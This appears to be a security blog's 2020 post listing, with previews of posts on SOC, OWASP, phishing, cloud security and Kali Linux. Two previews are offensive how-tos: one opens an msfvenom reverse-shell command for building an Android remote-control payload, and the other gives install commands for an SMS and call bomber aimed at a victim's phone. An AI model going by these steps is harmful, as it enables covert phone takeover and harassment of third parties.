Posts

Showing posts from 2020

SOC: Security Operations Center

Image
 A Security Operations Center (SOC) is a centralized unit that deals with security issues on an organizational and technical level. This is the definition of SOC. But wait did you get it?   Lets simplify it. You all know what "Hub" is...(You are reading a blog post on InfoSec Hub 🙇 )  A SOC acts like the hub. it continuously monitors organization's security posture while preventing, detecting ,analyzing and responding to cybersecurity incidents.         Main Work Done By SOC SOC monitors and analyze activity on networks,servers,endpoints and databases,applications and so on.   Establishing SOC  The first step in establishing an organization’s SOC is to clearly define a strategy that incorporates business-specific goals from various departments as well as input and support from executives. Plus infrastructure is required to support the strategy which is going to be implemented.   Benefits Of SOC Improvement in security incident detecti...

How to create a payload and access Android?

Image
Try at your own risk. Only for educational purpose. First let us get the basics clear...   What is Payload? In computer networking and telecommunications, when a transmission unit is sent from the source to the destination, it contains both a header and the actual data to be transmitted. This actual data is called the payload . What we will do? We will access the android device by creating a payload.   What we will get? We will get the full control of the android device for ex camera snapshots, call logs, contact logs, apps installed in phone, system info etc. How we will do this?      With the help of Metasploit we will create an apk file ie.payload. Then we will send this apk file to target target device. After installing the file on target device we will get full control of the device. Lets Start... We will use Kali Linux for this purpose.  First create a payload root@kali :~# msfvenom -p android/meterpreter/reverse_tcp LHOST=(your ip) LP...

T Bomb: SMS and Call Bomber! Hangs Your Smartphone!

Image
Discovering a tool which has capibility to hang your smartphone! T Bomb is an open source call and SMS bomber for Linux and Termux. T Bomb can send unlimited sms and calls on victim's phone so that the hang can get hang.  Installation Step 1. Type command  pkg install git Step 2. pkg install python Step 3. git clone https://github.com/TheSpeedX/TBomb.git Step 4. cd TBomb Step 5. chmod +x TBomb.sh  Now run the tool Step 6. cd TBomb Step 7. ./TBomb.sh And Boom!!! Now perform as per instructed. Press Enter Press 1 for SMS bomber Press 2 for Call bomber Press 3 To  Update (Works On Linux And Linux Emulators) Press 4 To  View Features Press 5 To  Exit Important: Only For Educational Purpose. We are not responsible if any kind of misuse of this tool is identified.

Jio-Google Brings 5G Revolution In India!

Image
Today world is facing Corona pandemic. This resulted in a global lockdown thereby affecting world-wide unemployment. Millions of people lost their job. But there are some exceptions. Many companies big and small experienced great losses in their businesses. Some even went bankrupt. But on the other hand their are some companies that found way and reached new heights. And Reliance Jio is one of them. Reliance Jio already bought revolution in Telecom industry by launching Jio in 2016 and providing free / cheap mobile data. Now Jio made various contracts by companies such as Facebook, Qualcomm,Intel and now The Tech Giant Google. This made Mukesh Ambani 6th Most Richest person in the world. He overtook Larry Page in the list. In the 43rd RIL AGM, Google declared to invest Rs.33737 Crores at 7.7% stake. Jio made binding partnership and investment agreement with Google. After Google's investment now total 14 companies have invested in Jio.  Vario...

Phishing: A sweet poison!

Image
Phishing  is a fradulent attempt to obtain sensitive information such as passwords, usernames, credit card details by disguising oneself as a trustworthy entity in an electronic communication. This is how Phishing is defined.Got It? No. That's ok. You will get it by the end of this blog. Hackers are creative and they should be!  One such famous hacking technique or a way to gain information of target user is is called Phishing. Phising is method to gather personal information using mainly deceptive emails and websites. The goal is to make the target believe that the message,mail or website is something important for him for example a bank request,donation and to force him to click the link. It is one of the oldest type of cyberattacks dating back to 1990's and still one of the most popular attack between hackers. How Phishing got its name? Yes you guessed it right. Phishing is similar to word Fishing. The letter "f" is replaced by "p". As in fishing, the fis...

OWASP Top 10 vulnerabilities

Image
What is OWASP? OWASP which stands for Open Web Application Security Project is an international non-profit organization dedicated to web application security.  It produces various articles, methodologies, tools and technologies in the field of web application security. It was established in 2001 with the goal to protect web applications from cyber attacks. What is OWASP Top 10?    OWASP Top 10 prioritizes most common web securities risks affecting the web applications. The point to consider here is that there are more than 10 security but only top 10 are included. There are four criterias used for making this list. They are Ease of exploitability Prevalence Detectibility Business Impact The list was firstly published in the year 2003. Then updated in the year 2004,2007,2010,2013 and 2017. Top 10 Vulnerabilities 1.Injection An Injection vulnerability allows attackers to send unfriendly,hostile data to an interpreter causing the data to be compiled and executed on the serve...

Cloud Security Explained

Image
As we know that cloud is nothing but a server which we (companies) take on rent to host their websites, apps and other such data. Security is very essential in cloud computing. Cloud Security consists of set of policies, controls and technologies that work together in union to protect cloud based systems. Cloud Security is protection of data from leakage,deletion ,data breach , session hijacking, insecure APIs,etc that can comprimise cloud security. Cloud data Security becomes important as we move our data centres, business processes to the cloud. Benefits of Cloud Security- Centralized security - As cloud centralizes aplications and data, cloud security centralizes protection. Managing the entities centrally enhances traffic analysis and web filtering. Reduced cost - The big advantage of using cloud storage and security is that it eliminates need for dedicated hardware. cloud offers 24/7 proactive security. Reliability - Cloud is very dependable. Users can safely acce...

'Namaste' to replace unsafe Zoom

Image
As the Corona virus spreaded across the globe, many countries imposed lockdown. This was responsible to implement 'work from home' for many companies (specially IT field). Due to work from home, the meetings were organised virtually. Various applications were used for conducting video conferencing. And the list was toped by Zoom, a company headquartered in San Jose, California. The downloads of the zoom app were dramatically increased by 1270% that is over 12 times from 22nd of February to 22nd of March. As a result Zoom's stock price hit to all time high in mid March. The Corona Virus originated as a boon to Zoom. But then Joe Cox writing for Vice Motherboard, reported on March 26 ,2020 that zoom ios app sends data to Facebook, even if you don't have a facebook account. Then Micah Lee and Yael Grauer writing for the Intercept, reported on March 31,2020 that Zoom meetings are'nt end to end encrypted, despite misleading marketing. People...

Phishing attack on PMCares Fund!

Image
Today world is experiancing a very tense situation of COVID 19. Due to corona virus pandemic almost all countries in the world are under economic slowdown. This includes major countries like America, France, India, Italy, and many others. India is moving towards becoming a 5 trillion $ economy by 2024 but corona virus is acting like a huge wall between the target and Indian economy. As this is a pandemic, to stop the spread of virus major decisions are taken by the Indian government. This includes 21 day lockdown and to follow social distancing. But due to lockdown Indian economy is suffering. To deal with this situation, Prime Minister Narendra Modi established a fund raising campaign naming it as PMCares Fund to gather donation from citizens. But unfortunately hackers have their eye on the site. Taking the advantage of the severe situation.... Hackers always try to take the advantage of the loopholes in everything. They know that from which situation today world is underg...

Cyber security in Banking Sector

Image
Gone are the days when people used to be in a line to withdraw or deposit their money in banks. Now within few clicks you can do any transaction or any work related to bank even on your smartphone. But as coin has two sides, so does technology.  The banking sector is under threat from its existance. Earlier their were physical, actual thieves who would rob the bank but now there ie no need of any physical harm. Now hackers enter in the banks network and hack into the system and collect customer's personal information. So Cybersecurity is very important in the banks. The main agenda of having cyber security in banks is protecting customer's vital, personal information such as account number, transaction details,etc. Nowadays all the work of bank is done on computers. Almost all banks today have their app which its customers use for transaction. The customers can easily access all the services provided by the bank within seconds.If in any case their account is hac...

The CIA Triad

Image
The CIA triad of Confidentiality, Integrity and Availability are at the core of Information Security. Information Security professionals who create policies and procedures must cosider each goal when creating a plan in order to protect computer system. Confidentiality In Information Security, Confidentiality is property that the information is not made available or disclosed to unauthorized use to individuals, entities or processes. Confidentiality is the component of privacy that implements to protect our data from unauthorized viewers. confidentiality involves set of rules or promise usually executed through confidentiality aggrements that limits access or places restrictions on certain type of information. Attacks that affect Confidentiality Password cracking Packet sniffing Wiretapping Keylogging Dumpster diving Phishing Integrity In InfoSec data integrity means maintaining and assuring the accuracy and completeness of da...

Coronavirus and Cyber security

Image
Hackers always try to search for different ways to hack websites. The coronavirus pandemic is spreading day by day. Hackers are taking advantage of this situation as environment of fear is spread all over the world. The number of malicious emails mentioning the coronavirus has increased significantly since end of January.They are forging emails mentioning the outbreak that appeared while opening the messages, unleashing malwares. Various phishing mails are created in order to donate money for the treatment of virus affected people. In one such kind of phishing mail, hackers created a phishing mail by the name of WHO ie. World Health Organization. In that mail they created a donation form by the name of WHO. In this user fills the details of debit cards and eventually money are transferred to hacker's account. Also are also various other cases of Cyber attacks discovered. In one such type Android users are using app called CovidLock to track the coronavirus. The app i...

28th January : Data Privacy Day

Image
Data is today's currency. We are surrounded by data 24 by 7. Data Privacy Day occurs on 28th of January every year. This day is primarily observed in United States, European Union, Canada and Israel and 47 European countries but is also spreading in other parts of the world due to growing privacy concerns day by day. What is the need to observe this day? There's no doubt how important privacy is but we somehow become unconcerned about the loss of privacy of our data.A decade ago no one would have predicted how companies would end up basing their entire business model on user data but now gradually changes are seen in companies privacy policies which is a good thing.  Spread Data privacy Day was initially began as an educational event to increase the awareness among businesses to prote user privacy and protect user's data.The educational focus has expanded over years to include families and consumers.The international celebration offers many opportuni...

Kali Linux: Hacker's Paradise!!!

Image
"THE QUIETER YOU BECOME,THE MORE YOU ARE ABLE TO HEAR" This is not any motivational quote from any book but is the tagline of the most famous OS used in the Security field called as Kali Linux which was formerly called as BackTrack OS . Kali Linux is a Debian -based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools which are geared towards various Information Security tasks such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering. Kali Linux is developed, funded and maintained by Offensive Security , a leading Information Security training company. Now the main thing to notice is that using the Kali Linux that means using the preinstalled tools in Kali will not make you a hacker. Kali Linux is yet another Linux distribution based on Debian. Kali Linux is not for hacking and cracking or stealing someone's data or a Facebook passw...